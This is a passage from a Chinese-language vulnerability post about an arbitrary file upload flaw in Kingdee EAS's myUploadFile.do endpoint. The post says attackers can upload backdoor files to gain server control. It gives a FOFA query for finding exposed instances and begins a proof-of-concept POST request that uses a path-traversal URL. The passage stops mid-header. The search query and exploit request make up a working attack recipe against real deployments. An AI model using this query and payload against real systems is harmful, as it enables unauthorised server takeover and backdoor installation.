0x01 产品介绍
金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,其中myUploadFile.do存在任意文件上传。
0x02 漏洞概述
金碟EAS myUploadFile.do接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
搜索语法
fofa语法查找:app=”Kingdee-EAS”
0x03 漏洞复现
页面
poc:
POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 198
Accept: */*
Accept-Encoding: gzip, deflate
Con